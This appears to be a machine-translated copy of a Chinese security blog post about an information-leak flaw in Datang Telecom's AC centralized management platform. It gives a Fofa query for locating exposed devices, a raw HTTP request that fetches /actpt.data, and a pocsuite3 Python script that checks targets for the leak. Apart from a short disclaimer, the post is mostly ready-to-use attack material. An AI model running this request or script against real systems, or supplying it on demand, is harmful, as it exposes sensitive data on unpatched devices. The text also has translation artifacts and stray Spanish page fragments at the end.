Wiederauftreten der Sicherheitslücke – Sicherheitslücke in der zentralisierten Verwaltungsplattform von Datang Telecom AC, Leckage vertraulicher Informationen (mit Skript zur Erkennung von Sicherheitslücken)

Haftungsausschluss

Die im Artikel enthaltenen Schwachstellen wurden behoben und vertrauliche Informationen wurden codiert. Der Artikel dient nur dem Erfahrungsaustausch . Nehmen Sie ihn nicht ernst. Unbefugte Angriffe sind illegal! Vertrauliche Informationen im Artikel wurden auf mehreren Ebenen verarbeitet. Der Nutzer trägt die Verantwortung für alle direkten oder indirekten Folgen und Verluste, die durch die Verbreitung und Nutzung der in diesem Artikel bereitgestellten Informationen entstehen. Der Autor übernimmt hierfür keine Verantwortung. Bitte tragen Sie die Verantwortung für etwaige Folgen.

Beschreibung der Sicherheitslücke

Die zentralisierte Verwaltungsplattform von Datang Telecom AC weist eine Schwachstelle für den Verlust vertraulicher Informationen auf

Fofa-Erklärung

app="大唐电信AC集中管理平台" && fid="gmqJFLGz7L/7TdQxUJFBXQ=="

POC plus Erkennung

GET /actpt.data HTTP/1.1
Host: 
Referer: http://122.227.210.230:800/relogin.htm
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate

POC-Skript

Pocsuite-Framework für Skripte

# _*_ coding:utf-8 _*_
# @Time : 2023/12/22
# @Author: 炼金术师诸葛亮
from pocsuite3.api import Output, POCBase, register_poc, requests, logger
from pocsuite3.api import get_listener_ip, get_listener_port
from pocsuite3.api import REVERSE_PAYLOAD, random_str

class datang_dianxinAC_information_leakage(POCBase):
    pocDesc = '''大唐电信AC集中管理平台敏感信息泄漏漏洞'''
    author = '炼金术师诸葛亮'
    createDate = '2023-12-22'
    name = '大唐电信AC集中管理平台敏感信息泄漏漏洞'



    def _verify(self):

        result = {}
        url = self.url+ '/actpt.data'

        headers = {
            "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36",
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7",
            'Accept-Encoding': 'gzip, deflate',
            'Accept-Language': 'zh-CN,zh;q=0.9',
            'Connection': 'Keep-Alive',
            'Pragma': 'no-cache',
            'Upgrade-Insecure-Requests': '1',
            'Cache-Control': 'no-cache'
        }

        try:


            response = requests.get(url, headers=headers)
            if response.status_code == 200 and 'id' in response.text:
                result['VerifyInfo'] = {}


            return self.parse_output(result)
        except Exception as e:
            pass

register_poc(datang_dianxinAC_information_leakage)

Skript-Exploit

Supongo que te gusta

Origin blog.csdn.net/jjjj1029056414/article/details/135155552
Recomendado
Clasificación